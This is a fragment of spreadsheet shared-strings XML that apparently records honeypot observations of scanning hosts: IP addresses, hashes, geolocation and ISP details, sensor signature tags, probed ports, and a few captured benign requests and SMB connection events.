  <si>
    <t>::ffff:75c1:66a1</t>
  </si>
  <si>
    <t>ba2d1b447de51289f784c379f827c671</t>
  </si>
  <si>
    <t>37.48.186.248</t>
  </si>
  <si>
    <t>Mtn</t>
  </si>
  <si>
    <t>::ffff:2530:baf8</t>
  </si>
  <si>
    <t>69c6fdbe1a3a5ad8cb20ba1f1352d10d</t>
  </si>
  <si>
    <t>117.210.182.2</t>
  </si>
  <si>
    <t>::ffff:75d2:b602</t>
  </si>
  <si>
    <t>7e0c000914bc21473f987d03f77c4311</t>
  </si>
  <si>
    <t>59.92.160.38</t>
  </si>
  <si>
    <t>::ffff:3b5c:a026</t>
  </si>
  <si>
    <t>2c9a36bdc93f3ec6cacea75f4b6b030d</t>
  </si>
  <si>
    <t>117.195.136.219</t>
  </si>
  <si>
    <t>::ffff:75c3:88db</t>
  </si>
  <si>
    <t>0ba74b9fdcce244f6422b086d2620e10</t>
  </si>
  <si>
    <t>117.232.57.254</t>
  </si>
  <si>
    <t>::ffff:75e8:39fe</t>
  </si>
  <si>
    <t>ff464472a28187de148e3471fc189c56</t>
  </si>
  <si>
    <t>120.61.247.169</t>
  </si>
  <si>
    <t>::ffff:783d:f7a9</t>
  </si>
  <si>
    <t>f7004096f9498186e292d25bbf45e8e7</t>
  </si>
  <si>
    <t>80.117.122.121</t>
  </si>
  <si>
    <t>host-80-117-122-121.pool80117.interbusiness.it&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:5075:7a79</t>
  </si>
  <si>
    <t>6595cb1d48bd310843e8f5f34aceb60b</t>
  </si>
  <si>
    <t>117.247.180.66</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:75f7:b442</t>
  </si>
  <si>
    <t>c2b64532b346349428583a812b3d5f6c</t>
  </si>
  <si>
    <t>59.178.153.194</t>
  </si>
  <si>
    <t>::ffff:3bb2:99c2</t>
  </si>
  <si>
    <t>80e0d06e21e1efa50ef5efdb035af5a6</t>
  </si>
  <si>
    <t>117.207.44.87</t>
  </si>
  <si>
    <t>::ffff:75cf:2c57</t>
  </si>
  <si>
    <t>06545f0d525954dfd3c3cb7334e9a581</t>
  </si>
  <si>
    <t>117.209.111.168</t>
  </si>
  <si>
    <t>::ffff:75d1:6fa8</t>
  </si>
  <si>
    <t>6a965db78fe1a4d7d2e4b3217d72502d</t>
  </si>
  <si>
    <t>117.235.252.151</t>
  </si>
  <si>
    <t>::ffff:75eb:fc97</t>
  </si>
  <si>
    <t>34d88b366ca6ed41d5f16b1100d46f01</t>
  </si>
  <si>
    <t>117.199.196.165</t>
  </si>
  <si>
    <t>::ffff:75c7:c4a5</t>
  </si>
  <si>
    <t>21ac6f6eb4bf9df271ef327d2c0edf4b</t>
  </si>
  <si>
    <t>133.242.221.19</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_REDIS_HC1</t>
  </si>
  <si>
    <t>9100&amp;&amp;6379&amp;&amp;5900&amp;&amp;3306&amp;&amp;389&amp;&amp;1521&amp;&amp;41148&amp;&amp;3389</t>
  </si>
  <si>
    <t>7684</t>
  </si>
  <si>
    <t>SAKURA Internet Inc.</t>
  </si>
  <si>
    <t>Architectural Systems Inc.</t>
  </si>
  <si>
    <t>1997-03-01</t>
  </si>
  <si>
    <t>JPNIC-NET-JP-ERX</t>
  </si>
  <si>
    <t>{Data_PJL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>::ffff:85f2:dd13</t>
  </si>
  <si>
    <t>4eb04b044d7cd99303b1844ba309bb65</t>
  </si>
  <si>
    <t>117.243.252.8</t>
  </si>
  <si>
    <t>::ffff:75f3:fc08</t>
  </si>
  <si>
    <t>82877a12f691db1d06fb0a2817670049</t>
  </si>
  <si>
    <t>120.61.82.50</t>
  </si>
  <si>
    <t>::ffff:783d:5232</t>
  </si>
  <si>
    <t>5b8195e744607075703eb94bd5836ee5</t>
  </si>
  <si>
    <t>59.184.151.61</t>
  </si>
  <si>
    <t>::ffff:3bb8:973d</t>
  </si>
  <si>
    <t>a97a3420890a687bd34e976128d754a1</t>
  </si>
  <si>
    <t>103.47.150.220</t>
  </si>
  <si>
    <t>New Delhi (Kirti Nagar Industrial Area)</t>
  </si>
  <si>
    <t>28.6472</t>
  </si>
  <si>
    <t>77.1449</t>
  </si>
  <si>
    <t>133712</t>
  </si>
  <si>
    <t>Spectra Technologies India Private Limited</t>
  </si>
  <si>
    <t>2015-01-05</t>
  </si>
  <si>
    <t>SPECTRACLOUD</t>
  </si>
  <si>
    <t>::ffff:672f:96dc</t>
  </si>
  <si>
    <t>f2b20a7ffda543eda6ba9b83fed4531e</t>
  </si>
  <si>
    <t>46.185.60.23</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;13839&amp;&amp;61152&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2eb9:3c17</t>
  </si>
  <si>
    <t>b282deed81d0f38ca5ba9eba43212d87</t>
  </si>
  <si>
    <t>59.88.81.188</t>
  </si>
  <si>
    <t>::ffff:3b58:51bc</t>
  </si>
  <si>
    <t>bb5e8723ff9282076b7fd3f7dd692c26</t>
  </si>
  <si>
    <t>46.119.215.123</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;9652&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:d77b</t>
  </si>
  <si>
    <t>0691d5afb2ba5bf17f1b6fcca8dadcab</t>
  </si>
  <si>
    <t>117.244.5.240</t>
  </si>
  <si>
    <t>::ffff:75f4:5f0</t>
  </si>
  <si>
    <t>028e7871b223a082bc7b449c39f8bb16</t>
  </si>
  <si>
    <t>37.36.91.122</t>
  </si>
  <si>
    <t>::ffff:2524:5b7a</t>
  </si>
  <si>
    <t>8e1c9f8b8801a83e3218425d5c1f9fe5</t>
  </si>
  <si>
    <t>173.31.9.60</t>
  </si>
  <si>
    <t>Polk</t>
  </si>
  <si>
    <t>Des Moines</t>
  </si>
  <si>
    <t>4853828</t>
  </si>
  <si>
    <t>50307</t>
  </si>
  <si>
    <t>41.5868</t>
  </si>
  <si>
    <t>-93.625</t>
  </si>
  <si>
    <t>::ffff:ad1f:93c</t>
  </si>
  <si>
    <t>7da223115f2cebab7450963c7017ef50</t>
  </si>
  <si>
    <t>117.205.159.137</t>
  </si>
  <si>
    <t>::ffff:75cd:9f89</t>
  </si>
  <si>
    <t>97702dcd9231fdf92da4be5325a11f3f</t>
  </si>
  <si>
    <t>46.119.206.79</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_SSH_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;37489</t>
  </si>
  <si>
    <t>::ffff:2e77:ce4f</t>
  </si>
  <si>
    <t>edd0292c51f34aa302af0a78b630d476</t>
  </si>
  <si>
    <t>117.221.120.223</t>
  </si>
  <si>
    <t>::ffff:75dd:78df</t>
  </si>
  <si>
    <t>45058b880c81e05dfa485fd9bcc569a2</t>
  </si>
  <si>
    <t>46.98.153.226</t>
  </si>
  <si>
    <t>23&amp;&amp;23609</t>
  </si>
  <si>
    <t>Dnipro (Sobornyi District)</t>
  </si>
  <si>
    <t>48.4484</t>
  </si>
  <si>
    <t>35.0733</t>
  </si>
  <si>
    <t>15377</t>
  </si>
  <si>
    <t>TRADITIONAL LLC</t>
  </si>
  <si>
    <t>ISP Fregat</t>
  </si>
  <si>
    <t>ISP Fregat Ltd</t>
  </si>
  <si>
    <t>::ffff:2e62:99e2</t>
  </si>
  <si>
    <t>f75343ca79b07c55ab0bf640367a1226</t>
  </si>
  <si>
    <t>103.59.44.102</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;52094&amp;&amp;1433</t>
  </si>
  <si>
    <t>Tanggamus Regency</t>
  </si>
  <si>
    <t>Kota Agung</t>
  </si>
  <si>
    <t>8537084</t>
  </si>
  <si>
    <t>-5.50257</t>
  </si>
  <si>
    <t>104.645</t>
  </si>
  <si>
    <t>138881</t>
  </si>
  <si>
    <t>PT INDONESIA TRANS NETWORK</t>
  </si>
  <si>
    <t>CV Gisting Trans Network</t>
  </si>
  <si>
    <t>2022-12-23</t>
  </si>
  <si>
    <t>IDNIC-GISTINGTRANS-ID</t>
  </si>
  <si>
    <t>::ffff:673b:2c66</t>
  </si>
  <si>
    <t>b1a1566d3df89652c91188822710d748</t>
  </si>
  <si>
    <t>176.114.234.38</t>
  </si>
  <si>
    <t>Lower Silesia</t>
  </si>
  <si>
    <t>Jelenia Góra County</t>
  </si>
  <si>
    <t>Sosnówka</t>
  </si>
  <si>
    <t>3085119</t>
  </si>
  <si>
    <t>50.8183</t>
  </si>
  <si>
    <t>15.7232</t>
  </si>
  <si>
    <t>198709</t>
  </si>
  <si>
    <t>Jacek Jarosz trading as Info Serwis</t>
  </si>
  <si>
    <t>2012-04-16</t>
  </si>
  <si>
    <t>::ffff:b072:ea26</t>
  </si>
  <si>
    <t>7bc349ffcb67522e40a06347ea68afac</t>
  </si>
  <si>
    <t>41.47.176.92</t>
  </si>
  <si>
    <t>30.0384</t>
  </si>
  <si>
    <t>31.2098</t>
  </si>
  <si>
    <t>::ffff:292f:b05c</t>
  </si>
  <si>
    <t>d6fb6b6945ca6a85b2158904a2c842e4</t>
  </si>
  <si>
    <t>42.114.214.228</t>
  </si>
  <si>
    <t>Quận Nam Từ Liêm</t>
  </si>
  <si>
    <t>Cầu Diễn</t>
  </si>
  <si>
    <t>8616055</t>
  </si>
  <si>
    <t>21.0393</t>
  </si>
  <si>
    <t>::ffff:2a72:d6e4</t>
  </si>
  <si>
    <t>76192ae35e14186399bcb1de5d9c85d1</t>
  </si>
  <si>
    <t>108.170.77.238</t>
  </si>
  <si>
    <t>Static IP Services</t>
  </si>
  <si>
    <t>::ffff:6caa:4dee</t>
  </si>
  <si>
    <t>564488d9a3c9941ec4e8a27937d92149</t>
  </si>
  <si>
    <t>178.124.187.19</t>
  </si>
  <si>
    <t>Barysaw District</t>
  </si>
  <si>
    <t>Borisov</t>
  </si>
  <si>
    <t>630376</t>
  </si>
  <si>
    <t>222120</t>
  </si>
  <si>
    <t>54.2279</t>
  </si>
  <si>
    <t>28.505</t>
  </si>
  <si>
    <t>Belpak</t>
  </si>
  <si>
    <t>::ffff:b27c:bb13</t>
  </si>
  <si>
    <t>09e5cb302d2ea78fe3a0464179e30908</t>
  </si>
  <si>
    <t>61.0.157.121</t>
  </si>
  <si>
    <t>::ffff:3d00:9d79</t>
  </si>
  <si>
    <t>89b5495abd3294131c0dba904b47ef7f</t>
  </si>
  <si>
    <t>59.178.2.195</t>
  </si>
  <si>
    <t>::ffff:3bb2:2c3</t>
  </si>
  <si>
    <t>0cb9337f314bcc0aeda49a9a9e38b6f9</t>
  </si>
  <si>
    <t>117.192.129.64</t>
  </si>
  <si>
    <t>::ffff:75c0:8140</t>
  </si>
  <si>
    <t>f8e4147f05124e34098655cee28a8855</t>
  </si>
  <si>
    <t>117.193.151.35</t>
  </si>
  <si>
    <t>::ffff:75c1:9723</t>
  </si>
  <si>
    <t>9d638f1dbf085516c54565f905a1da6f</t>
  </si>
  <si>
    <t>124.218.93.57</t>
  </si>
  <si>
    <t>25.0571</t>
  </si>
  <si>
    <t>121.614</t>
  </si>
  <si>
    <t>7482</t>
  </si>
  <si>
    <t>APOL-AS</t>
  </si>
  <si>
    <t>Asia Pacific On-line Service Inc.</t>
  </si>
  <si>
    <t>::ffff:7cda:5d39</t>
  </si>
  <si>
    <t>c77a730ae3a34569ca1bb3150231936e</t>
  </si>
  <si>
    <t>117.209.80.110</t>
  </si>
  <si>
    <t>::ffff:75d1:506e</t>
  </si>
  <si>
    <t>ecc2514702ac9cfb92ecf935e6aa805f</t>
  </si>
  <si>
    <t>93.182.70.205</t>
  </si>
  <si>
    <t>35.1753</t>
  </si>
  <si>
    <t>33.3642</t>
  </si>
  <si>
    <t>::ffff:5db6:46cd</t>
  </si>
  <si>
    <t>639adffc7be48773d6ec256734e4647b</t>
  </si>
  <si>
    <t>117.207.176.182</t>
  </si>
  <si>
    <t>::ffff:75cf:b0b6</t>
  </si>
  <si>
    <t>06124fdea4303a12e5900a156a62db90</t>
  </si>
  <si>
    <t>117.195.23.15</t>
  </si>
  <si>
    <t>::ffff:75c3:170f</t>
  </si>
  <si>
    <t>2dd395e35b9e940a1c3cd1cafa2753c9</t>
  </si>
  <si>
    <t>37.229.8.80</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6917&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:25e5:850</t>
  </si>
  <si>
    <t>0b8bcf7085df5ee809042d347d97b29e</t>
  </si>
  <si>
    <t>14.46.69.43</t>
  </si>
  <si>
    <t>::ffff:e2e:452b</t>
  </si>
  <si>
    <t>b313959b28798fd6267368302c1a1205</t>
  </si>
  <si>
    <t>47.61.106.52</t>
  </si>
  <si>
    <t>Aragon</t>
  </si>
  <si>
    <t>Saragossa</t>
  </si>
  <si>
    <t>Villamayor de Gállego</t>
  </si>
  <si>
    <t>11994483</t>
  </si>
  <si>
    <t>41.6858</t>
  </si>
  <si>
    <t>-0.7723</t>
  </si>
  <si>
    <t>Vodafone Global Enterprise Inc.</t>
  </si>
  <si>
    <t>Vodafone Spain</t>
  </si>
  <si>
    <t>::ffff:2f3d:6a34</t>
  </si>
  <si>
    <t>eda371ec9c4bd122d0954f93e3d49d83</t>
  </si>
  <si>
    <t>180.188.147.87</t>
  </si>
  <si>
    <t>Hung Hom</t>
  </si>
  <si>
    <t>1819718</t>
  </si>
  <si>
    <t>22.3031</t>
  </si>
  <si>
    <t>114.192</t>
  </si>
  <si>
    <t>10118</t>
  </si>
  <si>
    <t>Domain Five Enterprises Ltd</t>
  </si>
  <si>
    <t>2009-09-17</t>
  </si>
  <si>
    <t>H3GHK</t>
  </si>
  <si>
    <t>::ffff:b4bc:9357</t>
  </si>
  <si>
    <t>9b790830143639920e410e8d31851413</t>
  </si>
  <si>
    <t>47.40.30.211</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-047-040-030-211.res.spectrum.com</t>
  </si>
  <si>
    <t>Saint Louis</t>
  </si>
  <si>
    <t>Charlack</t>
  </si>
  <si>
    <t>4380976</t>
  </si>
  <si>
    <t>38.7049</t>
  </si>
  <si>
    <t>-90.3466</t>
  </si>
  <si>
    <t>::ffff:2f28:1ed3</t>
  </si>
  <si>
    <t>5ed50130445089452999861252ce62fc</t>
  </si>
  <si>
    <t>220.107.229.130</t>
  </si>
  <si>
    <t>NA&amp;&amp;p4170130-ipxg12701sapodori.hokkaido.ocn.ne.jp</t>
  </si>
  <si>
    <t>2003-03-03</t>
  </si>
  <si>
    <t>OCN-JPNIC-JP</t>
  </si>
  <si>
    <t>::ffff:dc6b:e582</t>
  </si>
  <si>
    <t>48fcb62de2b2f432e4d9b06bfbef23b0</t>
  </si>
  <si>
    <t>220.122.114.144</t>
  </si>
  <si>
    <t>23&amp;&amp;44937&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc7a:7290</t>
  </si>
  <si>
    <t>d80ce4c05d3dfd2e264027b2658944a8</t>
  </si>
  <si>
    <t>114.32.209.156</t>
  </si>
  <si>
    <t>114-32-209-156.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7220:d19c</t>
  </si>
  <si>
    <t>6d9adc30f5c7ac3324ec93a823fc598d</t>
  </si>
  <si>
    <t>13.218.176.166</t>
  </si>
  <si>
    <t>NA&amp;&amp;ec2-13-218-176-166.compute-1.amazonaws.com</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_HC1</t>
  </si>
  <si>
    <t>21&amp;&amp;6379&amp;&amp;3306&amp;&amp;5432&amp;&amp;389&amp;&amp;23&amp;&amp;8443&amp;&amp;110&amp;&amp;143</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_FTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_IMAP:NA}</t>
  </si>
  <si>
    <t>::ffff:dda:b0a6</t>
  </si>
  <si>
    <t>7ea49e7a2ca617fab2e8d7d9607d243e</t>
  </si>
  <si>
    <t>117.206.140.160</t>
  </si>
  <si>
    <t>::ffff:75ce:8ca0</t>
  </si>
  <si>
    <t>c45002c0504fc8dbcb044c96d5f73cba</t>
  </si>
  <si>
    <t>103.103.52.172</t>
  </si>
  <si>
    <t>Assam</t>
  </si>
  <si>
    <t>Kamrup Metro</t>
  </si>
  <si>
    <t>Guwahati (Jaya Nagar)</t>
  </si>
  <si>
    <t>1271476</t>
  </si>
  <si>
    <t>781015</t>
  </si>
  <si>
    <t>26.1268</t>
  </si>
  <si>
    <t>91.8059</t>
  </si>
  <si>
    <t>135863</t>
  </si>
  <si>
    <t>CATLA-AS-IN</t>
  </si>
  <si>
    <t>Catla IT and Engg.Co.Pvt.Ltd</t>
  </si>
  <si>
    <t>::ffff:6767:34ac</t>
  </si>
  <si>
    <t>db84ed96e53c0ac0abd48a49794fa031</t>
  </si>
  <si>
    <t>59.95.156.43</t>
  </si>
  <si>
    <t>::ffff:3b5f:9c2b</t>
  </si>
  <si>
    <t>90ad4b72bb5fa891753455dbd492895c</t>
  </si>
  <si>
    <t>59.127.101.38</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-101-38.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>59939&amp;&amp;59958&amp;&amp;59976&amp;&amp;59922&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7f:6526</t>
  </si>
  <si>
    <t>fbfa0d4cb5d34c58443553a9011d7a30</t>
  </si>
  <si>
    <t>220.133.90.223</t>
  </si>
  <si>
    <t>220-133-90-223.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc85:5adf</t>
  </si>
  <si>
    <t>260529d921e1a2ea6d0ce6fd33e21eaa</t>
  </si>
  <si>
    <t>117.219.78.169</t>
  </si>
  <si>
    <t>::ffff:75db:4ea9</t>
  </si>
  <si>
    <t>b91c5d5cf5b758442ce7c15fae343d47</t>
  </si>
  <si>
    <t>117.214.197.198</t>
  </si>
  <si>
    <t>::ffff:75d6:c5c6</t>
  </si>
  <si>
    <t>24dbb0bc05259e7becda9727d09e092e</t>
  </si>
  <si>
    <t>59.89.88.227</t>
  </si>
  <si>
    <t>::ffff:3b59:58e3</t>
  </si>
  <si>
    <t>b72f1bca720cddf1441065c6b11e1d94</t>
  </si>
  <si>
    <t>46.186.247.156</t>
  </si>
  <si>
    <t>MTC GPRS AS Number</t>
  </si>
  <si>
    <t>::ffff:2eba:f79c</t>
  </si>
  <si>
    <t>979f543d9b7afcbd51506608cd2ba1a4</t>
  </si>
  <si>
    <t>117.251.99.165</t>
  </si>
  <si>
    <t>::ffff:75fb:63a5</t>
  </si>
  <si>
    <t>ac1847f90458bd2f6db4a92f3cc3e043</t>
  </si>
  <si>
    <t>14.32.192.158</t>
  </si>
  <si>
    <t>::ffff:e20:c09e</t>
  </si>
  <si>
    <t>a9241c579b565212ef10652aa8df9c51</t>
  </si>
  <si>
    <t>182.59.91.15</t>
  </si>
  <si>
    <t>::ffff:b63b:5b0f</t>
  </si>
  <si>
    <t>b58d6dcc4cd71286b16157828442fe74</t>
  </si>
  <si>
    <t>59.184.63.28</t>
  </si>
  <si>
    <t>::ffff:3bb8:3f1c</t>
  </si>
  <si>
    <t>669dfdd2389e5017e328aa237550eaed</t>
  </si>
  <si>
    <t>121.153.76.42</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>::ffff:7999:4c2a</t>
  </si>
  <si>
    <t>b00627c02f6a203fd4a2376fe9dafd09</t>
  </si>
  <si>
    <t>117.102.88.42</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>Biznet Networks</t>
  </si>
  <si>
    <t>GI</t>
  </si>
  <si>
    <t>2007-07-11</t>
  </si>
  <si>
    <t>BIZNET-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,55016)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,59072)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,61557)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,62111)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,57478)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,57976)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:7566:582a</t>
  </si>
  <si>
    <t>e84f006b741c98404251da90c16eac5e</t>
  </si>
  <si>
    <t>120.60.179.143</t>
  </si>
  <si>
    <t>1268159</t>
  </si>
  <si>
    <t>12.8351</t>
  </si>
  <si>
    <t>79.7001</t>
  </si>
  <si>
    <t>::ffff:783c:b38f</t>
  </si>
  <si>
    <t>c622b05c22b28d9e39cd8a6d5f7e1683</t>
  </si>
  <si>
    <t>117.205.155.53</t>
  </si>
  <si>
    <t>::ffff:75cd:9b35</t>
  </si>
  <si>
    <t>dd5743c311da326497bf15ef3c48fff8</t>
  </si>
  <si>
    <t>114.35.133.60</t>
  </si>
  <si>
    <t>114-35-133-60.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;26397&amp;&amp;23&amp;&amp;59370&amp;&amp;80&amp;&amp;9100&amp;&amp;4109&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:853c</t>
  </si>
  <si>
    <t>943526011e54a568db4e1261bfd055fa</t>
  </si>
  <si>
    <t>59.30.242.50</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_REDIS_H36</t>
  </si>
  <si>
    <t>Chuncheon-si</t>
  </si>
  <si>
    <t>Chuncheon-si (Hupyeong-dong)</t>
  </si>
  <si>
    <t>1845134</t>
  </si>
  <si>
    <t>37.8826</t>
  </si>
  <si>
    <t>127.749</t>
  </si>
  <si>
    <t>::ffff:3b1e:f232</t>
  </si>
  <si>
    <t>2af567f3275279f42a4006e124653248</t>
  </si>
  <si>
    <t>120.61.165.165</t>
  </si>
  <si>
    <t>Mavoor</t>
  </si>
  <si>
    <t>1263280</t>
  </si>
  <si>
    <t>11.2667</t>
  </si>
  <si>
    <t>75.9167</t>
  </si>
  <si>
    <t>::ffff:783d:a5a5</t>
  </si>
  <si>
    <t>71acf9ba7586398fdd5cad8a50dc2bda</t>
  </si>
  <si>
    <t>117.232.57.48</t>
  </si>
  <si>
    <t>::ffff:75e8:3930</t>
  </si>
  <si>
    <t>ed87be54d5a757326c5265c87f771d20</t>
  </si>
  <si>
    <t>59.92.177.252</t>
  </si>
  <si>
    <t>QbWiFi</t>
  </si>
  <si>
    <t>::ffff:3b5c:b1fc</t>
  </si>
  <si>
    <t>86fe2f97611e4ea0d22e8255d877a334</t>
  </si>
